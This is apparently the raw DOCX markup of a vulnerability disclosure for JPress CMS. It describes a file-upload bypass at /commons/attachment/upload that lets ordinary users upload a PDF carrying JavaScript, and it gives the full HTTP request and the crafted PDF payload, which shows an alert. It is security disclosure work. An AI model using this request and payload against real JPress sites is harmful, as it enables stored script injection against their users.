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E60D36">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>JPRESS has XSS vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7C95B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1. Vulnerability Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474E55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Guizhou Xiaoma Technology Co., Ltd. is a technology company focusing on Internet product development and technological innovation. The company is committed to providing customers with high-quality technical solutions, software development and product design services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D535D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There is a file upload vulnerability in /commons/attachment/upload of jpress cms under its name. Attackers can bypass suffix detection and use ordinary users to upload malicious PDF files to implement XSS attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29493EF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5F41A5"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2. Impact of the vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA682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Ordinary users perform XSS attacks by uploading files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425F949">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="246162DC"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3. Vulnerability location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C4CCF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\jpress-web\src\main\java\io\jpress\web\commons\controller\AttachmentController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D459DD6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A206CC6"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4. Code analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B56D3E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Under the /commons/attachment/ route, user cookies and file upload detection are set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD4B91">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B950B4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2715" cy="5347970"/>
            <wp:effectExtent l="0" t="0" r="698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534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77A1DE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AttachmentUtils.isUnSafe(file) sets the suffix blacklist and bypasses it by uploading a file with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> suffix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0333026D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F63819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6685" cy="4523740"/>
            <wp:effectExtent l="0" t="0" r="571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EC0ADD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>5. Vulnerability Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AD782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Download the corresponding source code on gitee for construction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109BC34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Source code link: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"https://gitee.com/JPressProjects/jpress"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</w:rPr>
        <w:t>https://gitee.com/JPressProjects/jpress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 w14:paraId="48666A9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C433F8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Register as a normal user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B734FBB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259705" cy="3321050"/>
            <wp:effectExtent l="0" t="0" r="1079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9A63"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User login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D720B8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259705" cy="3321050"/>
            <wp:effectExtent l="0" t="0" r="1079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7FAE"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Upload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pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the avatar settings and use burpsuite to capture the package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D568FFE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u1496359a"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5171440" cy="284924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83BDA6"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Get upload address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B61A69">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="4134485"/>
            <wp:effectExtent l="0" t="0" r="571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2A48">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264785" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="5715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B63C"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Make a visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A443D7D">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5259705" cy="3321050"/>
            <wp:effectExtent l="0" t="0" r="1079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AAC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bookmarkStart w:id="1" w:name="GfTZv"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>POST /commons/attachment/upload?csrf_token=a625fddb1a895b58fe46171ba6076cbe HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608D784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Host: 192.168.31.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FC974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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C294454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Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9306C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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEE86B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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0064B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X-Requested-With: XMLHttpRequest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337BC6EB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Content-Type: multipart/form-data; boundary=---------------------------422460438531578718971696704032</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E6B74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Content-Length: 1664</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F173846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Origin: http://192.168.31.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3059E62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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB33DE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Referer: http://192.168.31.1:8080/ucenter/avatar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611266D2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Cookie: _jpanonym="NDAzZGZkOGU0YTZjMjZiYjhkYzA5ZmEwZWNiYTNkNDgjMTczMzA1NzY4Mzg2NSMzMTUzNjAwMCNZekJsWVRWbU16bGhOVGN5TkRZNE9XRXlPVGs1TUdObU5ESmxOR014WmpVPQ=="; _jpuid="MGRlMDMwYzA5MDI2ODYzYmRlOTRiNjY0YmFmMDZkYzEjMTczMzA2MTU4Mzc0NyMxNzI4MDAjTWc9PQ=="; Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a=1733057722,1733058887; csrf_token=a625fddb1a895b58fe46171ba6076cbe; Hm_lpvt_bfe2407e37bbaa8dc195c5db42daf96a=1733061520; HMACCOUNT=0B84CEA38F9367FA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C5E1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5CA651E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1A0CB786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name="path"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B3A8B6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2BBE7A40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3C784A0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0F3365E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name="x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C37F05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47490987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72D07F6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06CD061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name="y"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BAEB00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241663D2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192B4111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546C88E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name="w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371D16A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231CAFD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2D73E9E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272B9B4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name="h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707992A2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1C6FEC3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2C210036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5104AA50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name="uid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F2263B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37ECD9D2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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030E57E4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5212999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name="csrf_token"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F605A72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0AC3A6C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a625fddb1a895b58fe46171ba6076cbe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A63632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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8ECFA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Content-Disposition: form-data; name="files[]"; filename="xss.pdf"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FF962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Content-Type: application/pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189D96F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62804CED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%PDF-1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE50B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%âãÏÓ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C029D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 0 obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B083B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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F49C1B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/Type /Pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25F8C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/Count 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6124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/Kids [ 4 0 R ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40658D90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339AE98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endobj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE5FC5D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 0 obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F791ED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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F409EC7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/Producer (PyPDF2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86C83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4CC8E52B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endobj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0365E27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 0 obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734055F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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0A7C8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/Type /Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C840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/Pages 1 0 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D4642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/Names &lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46781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/JavaScript &lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D58EF91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/Names [ (75bceca9\0559f5d\0554daa\05595ca\055d481ffa1a5ff) 5 0 R ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5684791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049715E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654D174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253A10F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endobj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458F4F6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 0 obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB04F5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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC205A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/Type /Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B487A7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/Resources &lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146329A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20A3257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/MediaBox [ 0 0 72 72 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402B0DD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/Parent 1 0 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F147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41257EB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endobj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093A8C0D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5 0 obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A89B3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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014EFC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/Type /Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529F4F47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/S /JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367DEBE7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/JS (app\056alert\050\047Youkill\047\051\073)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417A2D3B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048ECB7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endobj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670C6FF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xref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44716547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0 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B00443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0000000000 65535 f </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B4F2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0000000015 00000 n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36226028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0000000074 00000 n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB97E5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0000000114 00000 n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41437CD0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0000000262 00000 n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F87C0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0000000350 00000 n </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8342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trailer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40955BC1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&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437AB82E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/Size 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3A02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/Root 3 0 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9227AA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/Info 2 0 R</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B3F3D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&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A7A36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startxref</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A167780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446</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D96EF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%%EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C667F9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</w:p>
    <w:p w14:paraId="155B636C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-----------------------------422460438531578718971696704032--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCE2043">
      <w:pPr>
        <w:pStyle w:val="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</w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="3F8DEDEE"/>
    <w:p w14:paraId="3AC23DC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D26DF57">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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382F38"/>
    <w:rsid w:val="7038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5">
    <w:name w:val="_Style 2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2024-12-01T15:10:00Z</dcterms:created>
  <dc:creator>巴扎黑和吾皇</dc:creator>
  <cp:lastModifiedBy>巴扎黑和吾皇</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-01T15:23:10Z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9064A1733BDE487C9569C65121B26AF7_11</vt:lpwstr>
  </property>
</Properties>
</file>